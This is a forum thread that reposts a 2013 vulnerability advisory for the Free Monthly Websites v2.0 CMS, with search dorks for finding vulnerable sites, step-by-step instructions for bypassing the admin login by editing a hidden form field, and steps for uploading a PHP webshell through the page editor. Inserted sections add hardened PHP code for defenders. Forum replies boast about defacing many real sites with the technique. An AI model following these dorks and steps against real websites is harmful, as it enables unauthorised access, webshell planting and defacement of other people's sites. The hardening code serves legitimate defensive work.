Free Monthly Websites v2.0 - Multiple Web Vulnerabilities
#1
This is already 2 months old :v but 2 weeks ago I tried it and there were still sites affected ... good for gaining experience, bro..
sorry if I'm sharing this late Wink Wink

English again, but full of pictures :-bd :-bd
Title:
======
Free Monthly Websites v2.0 - Multiple Web Vulnerabilities


Date:
=====
2013-02-04


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=851


VL-ID:
=====
851


Common Vulnerability Scoring System:
====================================
8.5


Introduction:
=============
Free Monthly Websites 2.0 is here and you no longer have to worry about editing complicated HTML code as we have
taken care of that for you, and you no longer have to worry about anything to do with website design as we have taken
care of that for you too, adding your Google AdSense Publisher code, taken care of, ClickBank! All done for you,
here's how it works. Upload Your Site To Your Domain (this can be done for you). Login To Your Admin Control Panel.
Personalize Your Website (takes just 5 minutes).

(Copy of the Vendor Homepage: http://www.freemonthlywebsites2.com/ )


Abstract:
=========
The independent Vulnerability Laboratory researcher (x-Cisadane) discovered multiple web vulnerabilities in the Free Monthly Websites v2.0 CMS.


Report-Timeline:
================
2013-02-04: Public Disclosure


Status:
========
Published


Exploitation-Technique:
=======================
Defensiv


Severity:
=========
Critical


Details:
========
Multiple web vulnerabilities are detected in the Free Monthly Websites v2.0 Content Management System.
The first vulnerability allows attackers to bypass the web application's authentication on the admin login.
The second vulnerability allows attackers to upload files such as webshells and then access them after upload via unauthorized web access.

Vulnerable Module(s):
[+] Login Auth (Admin) - Bypass
[+] Upload File - Unauthorized File Upload & Access


Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers without user interaction or a privileged application user account.
For demonstration or to reproduce ...

Dork(s):
inurl:/index_ebay.php
"Powered by: Resell Rights Fortune"
"Generating Traffic to Your Site with Keyword Based Articles"
Powered By: Free Monthly Websites 2.0


[ 1 ] Admin Login Bypass

Vulnerable page http://target.com/[path]/admin/index.php
Line
40 <form name="frm" action="file_io.php" method="post" onSubmit="return chk()">
41 <input type="hidden" name="do_type" value="admin_settings_read">

Vulnerable page http://target.com/[path]/admin/login.php
Line
40 <form name="frm" action="file_io.php" method="post" onSubmit="return chk()">
41 <input type="hidden" name="do_type" value="admin_settings_read">

Vulnerable page http://target.com/[path]/admin/file_io.php

Line
14 if($_REQUEST[do_type]=="admin_settings_read")
15 {
16 $filename="settings/admin_settings.txt";
17
18 if(!$handle = fopen($filename, 'r'))
19 {
20 echo "Cannot open file ($filename)";
21 exit;
22 }
23 $contents = fread($handle, filesize($filename));
24 fclose($handle);
25 $argument_arr=explode("#_1_#",$contents);
26
27 if($argument_arr[0]==$_REQUEST[username] && $argument_arr[1]==$_REQUEST[pass])
28 {
29 $_SESSION[logged_in]=true;
30 header("location:welcome.php");

Based on line 16 we know that the admin username and password are stored in admin_settings.txt, NOT in a database!
So when we log in to the Admin Panel, file_io.php reads the valid username and password from admin_settings.txt.
If you access the file admin_settings.txt directly, the result is

403 Permission Denied
You do not have permission for this request /admin/settings/admin_settings.txt
Picture: [Image: 2gvlwt4.png]


So... How to Bypass the Admin Login Page?
1st. Open the Admin Login Page: http://target.com/[path]/admin/index.php

2nd. Inspect Element on the login form.
Picture: [Image: 2r5ddp1.png]

3rd. Change from
<form name="frm" action="file_io.php" method="post" onsubmit="return chk()"></form>
<input type="hidden" name="do_type" value="admin_settings_read">

CHANGE TO
<form name="frm" action="file_io.php" method="post" onsubmit="return chk()"></form>
<input type="text" name="do_type" value="admin_settings_write">
Then press ENTER (please see pic).
Pic : [Image: 351z3ib.png]

4th. You will see a Login Failed page: >> You need to login in to access that page <<
Picture: [Image: 33ws8jb.png]
Never mind about that, just click the 'Login' button and VOILA, you get Admin Access!
Picture: http://i45.tinypic.com/jzwpea.png
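For the defender side of section [ 1 ]: the steps above imply that the same login form, once do_type is switched to admin_settings_write, rewrites the credential file with whatever username and password were typed, and that the original compares plaintext values taken from $_REQUEST. The following is an added example written for this post, not the vendor's file_io.php, showing how the read and write branches would look with a session guard on the write path, a password hash in the credential file, and $_POST-only input. It keeps the page's file layout (settings/admin_settings.txt, separator #_1_#, welcome.php) as assumptions; the function names are hypothetical.

```php
<?php
// Added example (not the vendor's code): a hardened replacement for the
// file_io.php dispatch shown above. Assumed layout: the same
// settings/admin_settings.txt, but storing "username#_1_#<password_hash>"
// instead of a plaintext password. Function names are hypothetical.

declare(strict_types=1);
session_start();

const SETTINGS_FILE = __DIR__ . '/settings/admin_settings.txt';
const FIELD_SEP     = '#_1_#';   // same separator the original explode() uses

/** Load the stored admin username and password hash, or null if unreadable. */
function load_admin_credentials(string $file): ?array
{
    $contents = @file_get_contents($file);
    if ($contents === false) {
        return null;
    }
    $parts = explode(FIELD_SEP, trim($contents), 2);
    if (count($parts) !== 2) {
        return null;
    }
    return ['username' => $parts[0], 'hash' => $parts[1]];
}

/**
 * Verify a login attempt. The stored value is a password_hash() digest, so
 * the credential file reveals no password even if the 403 on settings/ is
 * ever misconfigured; hash_equals() keeps the username check constant-time.
 */
function verify_admin_login(?array $stored, string $username, string $password): bool
{
    if ($stored === null) {
        return false;
    }
    $user_ok = hash_equals($stored['username'], $username);
    $pass_ok = password_verify($password, $stored['hash']);
    return $user_ok && $pass_ok;   // both are evaluated, no early exit on username
}

/** Only an authenticated session may rewrite the credential file. */
function require_admin_session(): void
{
    if (empty($_SESSION['logged_in'])) {
        http_response_code(403);
        exit('You need to log in to access that page');
    }
}

// Read parameters from $_POST only, never $_REQUEST (which also accepts GET
// and cookie values), and compare the requested action with a strict ===.
$do_type = $_POST['do_type'] ?? '';

if ($do_type === 'admin_settings_read') {
    $stored = load_admin_credentials(SETTINGS_FILE);
    if (verify_admin_login($stored, $_POST['username'] ?? '', $_POST['pass'] ?? '')) {
        session_regenerate_id(true);        // fresh session id after login
        $_SESSION['logged_in'] = true;
        header('Location: welcome.php');
        exit;
    }
    http_response_code(401);
    exit('Login failed');
}

if ($do_type === 'admin_settings_write') {
    require_admin_session();                // the check the bypass above relies on being absent
    $new_user = $_POST['username'] ?? '';
    $new_pass = $_POST['pass'] ?? '';
    if ($new_user === '' || strlen($new_pass) < 12) {
        http_response_code(400);
        exit('Username required and password must be at least 12 characters');
    }
    $line = $new_user . FIELD_SEP . password_hash($new_pass, PASSWORD_DEFAULT);
    file_put_contents(SETTINGS_FILE, $line, LOCK_EX);
    header('Location: welcome.php');
    exit;
}

http_response_code(400);
exit('Unknown action');
```

The point a reviewer would check first is the write branch: any request that changes credentials has to be gated on an already-authenticated session, independent of which form the browser happens to submit, because the client can rename or retype any hidden field exactly as shown in step 3 above.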
----------------------------------------
[ 2 ] Upload PHP Backdoor or PHP Shell

This vulnerability works on PREMIUM VERSION of Free Monthly Websites 2.0

So... How to Upload a Backdoor (PHP Shell)?

1st. Go to Add/Remove Navigation Page.
http://target.com/[path]/admin/add_main_pages.php

2nd. In 'Enter a Name For Your New Navigation Page That You Wish To Add', enter: dwi.php
And click Add New Navigation Page.
Picture: [Image: vigzsp.png]

3rd. Still on the same page, scroll down until you see this section: Sort Your Page Buttons/Links.
Pic : [Image: 1040oxg.png]
Change FROM dwi.php.html TO /dwi.php, then click Sort Navigation Pages.
Picture: [Image: 24ec1l0.jpg]

4th. Go to Edit Navigation Page.
http://www.massmoneywebsites.com/admin/e..._pages.php
Please Select a Page To Edit: dwi.php.html <--- Select that page.

5th. Inspect element on dwi.php.html
Pic : [Image: 29pq1ix.png]
Change FROM <option value="dwi.php.html" selected="">dwi.php.html</option>
To <option value="dwi.php" selected="">dwi.php</option>
Picture: [Image: wtb0j6.png]

6th. Enter A Page Title As You Would Like It To Be Seen. Fill with dwi.php
URL For This Page: main_pages/dwi.php
Use the 'URL For This Page' field above: [Tick]
Display This Page in Left Vertical Site Navigation: [Tick]
Display This Page in Top Horizontal Site Navigation Buttons: [Tick]
Picture: [Image: 1zebnle.png]

7th. Still on the same page, scroll down until you see this section: Enter Content For Your Page:
Click the SOURCE button.
Press Enter twice at the first line, then paste your PHP backdoor/PHP shell below it.
And press Enter twice at the last line.
*Please see the 2 pictures below if you don't understand :p
Picture 1 : [Image: 1zlzxq0.png]
Picture 2 : [Image: 4rt1g4.png]
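For the defender side of section [ 2 ]: the steps above only work because the editor lets a tampered <option value> or the 'URL For This Page' field pick the output filename (main_pages/dwi.php) and then writes the pasted source verbatim. The following is an added example written for this post, not the vendor's add_main_pages.php or edit page, showing server-side filename handling where the extension is always chosen by the server and PHP open tags in the pasted content are neutralized. It assumes pages live under main_pages/ as on this page; the function names are hypothetical.

```php
<?php
// Added example (not the vendor's code): filename handling for a page
// editor like the Add/Edit Navigation Page flow above. Assumed layout:
// pages live under main_pages/; function names are hypothetical.

declare(strict_types=1);

const PAGES_DIR = __DIR__ . '/main_pages';

/**
 * Map a user-supplied page name to a file path inside PAGES_DIR, or return
 * null if the name is unacceptable. The extension is always .html and is
 * chosen here, so a tampered <option value="dwi.php"> or a 'URL For This
 * Page' of main_pages/dwi.php can never select a PHP file.
 */
function safe_page_path(string $dir, string $name): ?string
{
    // Keep only the part before the first dot: "dwi.php" and "dwi.php.html" both become "dwi".
    $first = strtok(basename($name), '.');
    if ($first === false) {
        return null;
    }
    $base = strtolower($first);
    if (!preg_match('/\A[a-z0-9][a-z0-9_-]{0,63}\z/', $base)) {
        return null;          // rejects slashes, dots, spaces and anything non-ASCII
    }
    return $dir . '/' . $base . '.html';
}

/**
 * Neutralize PHP open tags in pasted "source" so the saved file contains no
 * executable code even if the server is later misconfigured to run .html as PHP.
 */
function neutralize_php_tags(string $html): string
{
    return str_replace('<?', '&lt;?', $html);
}

/** Write page content; the target page is selected only by a validated name. */
function save_page(string $name, string $content): bool
{
    $path = safe_page_path(PAGES_DIR, $name);
    if ($path === null) {
        return false;
    }
    return file_put_contents($path, neutralize_php_tags($content), LOCK_EX) !== false;
}

// Constructed inputs mirroring the steps above (not from the page):
//   safe_page_path(PAGES_DIR, 'dwi.php')      -> ".../main_pages/dwi.html"
//   safe_page_path(PAGES_DIR, '/dwi.php')     -> ".../main_pages/dwi.html"
//   safe_page_path(PAGES_DIR, '../admin/x')   -> ".../main_pages/x.html" (basename drops the path)
//   safe_page_path(PAGES_DIR, '.htaccess')    -> ".../main_pages/htaccess.html"
```

As a second layer independent of the application, the web server should refuse to execute scripts under main_pages/ at all (with mod_php, `php_admin_flag engine off` in that directory's configuration), so that even a future bug in the name handling cannot turn a content upload into code execution.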


Risk:
=====
The security risk of the unauthorized file upload vulnerability via auth bypass is estimated as critical.


Credits:
========
X-Cisadane - ([email protected])
Greetz 2: X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club and Ngobas

Sumber :
http://www.exploit-db.com/exploits/24454/
http://packetstormsecurity.com/files/120...pload.html

#2
hahahaha, inspect element is dangerous too Big Grin
Don't Eat Your Friends' Bones | Kurawa |

#3
yeah bro :/
click the green one for me, ok :p

#4
hahaha...
when this tutorial first came out on 1337 I already tried it..

Got a WHOOOOLE lot of deface "fish" from it.

but now it's been patched by the site owners..

Smile
-------------------------------------------------------
FB : https://www.facebook.com/Black.dragonics
Tw : @Dluciver
http://www.sumbar.indonesianbacktrack.org/
-------------------------------------------------------
